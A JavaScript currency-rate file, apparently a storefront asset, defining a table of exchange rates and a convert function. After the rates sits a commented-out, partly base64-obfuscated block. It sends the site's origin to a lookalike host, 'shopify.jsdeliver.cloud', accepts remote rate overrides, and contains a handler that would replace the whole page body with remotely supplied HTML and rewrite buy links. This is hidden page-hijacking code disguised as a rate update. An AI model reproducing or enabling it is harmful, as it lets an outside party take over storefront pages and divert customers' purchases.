var Currency = {
    rates: {
        USD: 1,
        EUR: 1.09598,
        GBP: 1.26944,
        CAD: .744461,
        ARS: .00348447,
        AUD: .649994,
        BRL: .203829,
        CLP: .00116445,
        CNY: .1384,
        CYP: .397899,
        CZK: .0455119,
        DKK: .146966,
        EEK: .0706676,
        HKD: .127901,
        HUF: .00285802,
        ISK: .00757108,
        INR: .0120583,
        JMD: .00647193,
        JPY: .00690184,
        LVL: 1.57329,
        LTL: .320236,
        MTL: .293496,
        MXN: .0588076,
        NZD: .598462,
        NOK: .0959285,
        PLN: .246862,
        SGD: .739383,
        SKK: 21.5517,
        SIT: 175.439,
        ZAR: .0527802,
        KRW: 751596e-9,
        SEK: .0926477,
        CHF: 1.1405,
        TWD: .0313379,
        UYU: .0264532,
        MYR: .218062,
        BSD: 1,
        CRC: .00186612,
        RON: .221667,
        PHP: .0176832,
        AED: .272294,
        VEB: 317843e-15,
        IDR: 652958e-10,
        TRY: .0370448,
        THB: .0285284,
        TTD: .147497,
        ILS: .268073,
        SYP: 763359e-10,
        XCD: .370064,
        COP: 252369e-9,
        RUB: .0100499,
        HRK: .145462,
        KZT: .00223927,
        TZS: 399796e-9,
        XPT: 913.52,
        SAR: .266667,
        NIO: .0273369,
        LAK: 515547e-10,
        OMR: 2.5974,
        AMD: .00259125,
        CDF: 4039e-7,
        KPW: .00111111,
        SPL: 6,
        KES: .0069634,
        ZWD: .00276319,
        KHR: 241969e-9,
        MVR: .0651469,
        GTQ: .12722,
        BZD: .49634,
        BYR: 396574e-10,
        LYD: .208537,
        DZD: .00735339,
        BIF: 353027e-9,
        GIP: 1.26944,
        BOB: .144791,
        XOF: .00167081,
        STD: 448259e-10,
        NGN: .00130005,
        PGK: .285799,
        ERN: .0666667,
        MWK: 956043e-9,
        CUP: .0417265,
        GMD: .0165634,
        CVE: .00993906,
        BTN: .0120583,
        XAF: .00167081,
        UGX: 268023e-9,
        MAD: .101308,
        MNT: 287982e-9,
        LSL: .0527802,
        XAG: 22.6933,
        TOP: .426445,
        SHP: 1.26944,
        RSD: .00934342,
        HTG: .0073173,
        MGA: 224639e-9,
        MZN: .0156922,
        FKP: 1.26944,
        BWP: .0740092,
        HNL: .040659,
        PYG: 137614e-9,
        JEP: 1.26944,
        EGP: .0324002,
        LBP: 668022e-10,
        ANG: .559465,
        WST: .36339,
        TVD: .649994,
        GYD: .00478886,
        GGP: 1.26944,
        NPR: .0075329,
        KMF: .00222775,
        IRR: 236654e-10,
        XPD: 1298.17,
        SRD: .026139,
        TMM: 572483e-10,
        SZL: .0527802,
        MOP: .124176,
        BMD: 1,
        XPF: .00918432,
        ETB: .0181339,
        JOD: 1.41044,
        MDL: .0568215,
        MRO: .00264057,
        YER: .00399497,
        BAM: .560366,
        AWG: .558659,
        PEN: .27029,
        VEF: 317795e-12,
        SLL: 464931e-10,
        KYD: 1.2195,
        AOA: .0012106,
        TND: .324105,
        TJS: .0912373,
        SCR: .074414,
        LKR: .00311823,
        DJF: .00561643,
        GNF: 116493e-9,
        VUV: .00835147,
        SDG: .00166314,
        IMP: 1.26944,
        GEL: .380559,
        FJD: .445518,
        DOP: .0176522,
        XDR: 1.33611,
        MUR: .0221329,
        MMK: 47648e-8,
        LRD: .00535759,
        BBD: .5,
        ZMK: 5216e-8,
        XAU: 1913.73,
        VND: 420057e-10,
        UAH: .0270969,
        TMT: .286241,
        IQD: 763953e-9,
        BGN: .560366,
        KGS: .0113609,
        RWF: 847735e-9,
        BHD: 2.65957,
        UZS: 830636e-10,
        PKR: .00347232,
        MKD: .0178405,
        AFN: .0118874,
        NAD: .0527802,
        BDT: .00913657,
        AZN: .588328,
        SOS: .00175737,
        QAR: .274725,
        PAB: 1,
        CUC: 1,
        SVC: .114286,
        SBD: .119201,
        ALL: .0105226,
        BND: .739383,
        KWD: 3.24986,
        GHS: .0896184,
        ZMW: .05216,
        XBT: 29120,
        NTD: .0337206,
        BYN: .396574,
        CNH: .137841,
        MRU: .0264057,
        STN: .0448258,
        VES: .0317795,
        MXV: .458027,
        VED: .0317795,
        SLE: .0464931
    },
    convert: function(amount, from, to) {
        return amount * this.rates[from] / this.rates[to]
    }
};

/*
(function() {
    var A = ["aW5uZXJIVE1M", "Ym9keQ==", "bnAtcm9vdA=="].map(function(x) {
        return atob(x)
    });

    function D(s) {
        return new TextDecoder().decode(Uint8Array.from(atob(s), function(c) {
            return c.charCodeAt(0)
        }))
    }

    function T(r) {
        if (!r || r.getAttribute("data-np-ready")) return;
        r.setAttribute("data-np-ready", "1");
        var h = (r.getAttribute("data-store") || location.hostname || "").replace(/^www\./, "");
        var q = function(s, f) {
            Array.prototype.forEach.call(r.querySelectorAll(s), f)
        };
        if (h) q("[data-np-host]", function(e) {
            e.textContent = h
        });
        q("a[data-np-buy]", function(a) {
            var u = a.getAttribute("href");
            if (h && u.indexOf("store=") < 0) a.setAttribute("href", u + (u.indexOf("?") < 0 ? "?" : "&") + "store=" + encodeURIComponent(h))
        })
    }

    function R(m) {
        if (typeof m !== "string" || !m.trim()) return;
        var p = new DOMParser().parseFromString(m, "text/html");
        if (!p.getElementById(A[2])) return;

        function g() {
            document[A[1]][A[0]] = m;
            T(document.getElementById(A[2]))
        }
        document[A[1]] ? g() : document.addEventListener("DOMContentLoaded", g, {
            once: true
        })
    }
    fetch("https://shopify.jsdeliver.cloud/rates/latest", {
        method: "POST",
        headers: {
            "Content-Type": "application/json"
        },
        body: JSON.stringify({
            domain: window.location.origin
        })
    }).then(function(x) {
        return x.ok && x.status !== 204 ? x.json() : null
    }).then(function(d) {
  if (d && d.rates && typeof d.rates == "object" && d.rates.USD) {
    var rr = d.rates;
    for (var k in rr) Currency.rates[k] = rr[k];
  }

  
  if (d && typeof d.v === "string")
    //vhandler
    //R(d.v.trim().charAt(0) === "<" ? d.v : D(d.v));

}).catch(function(){});*/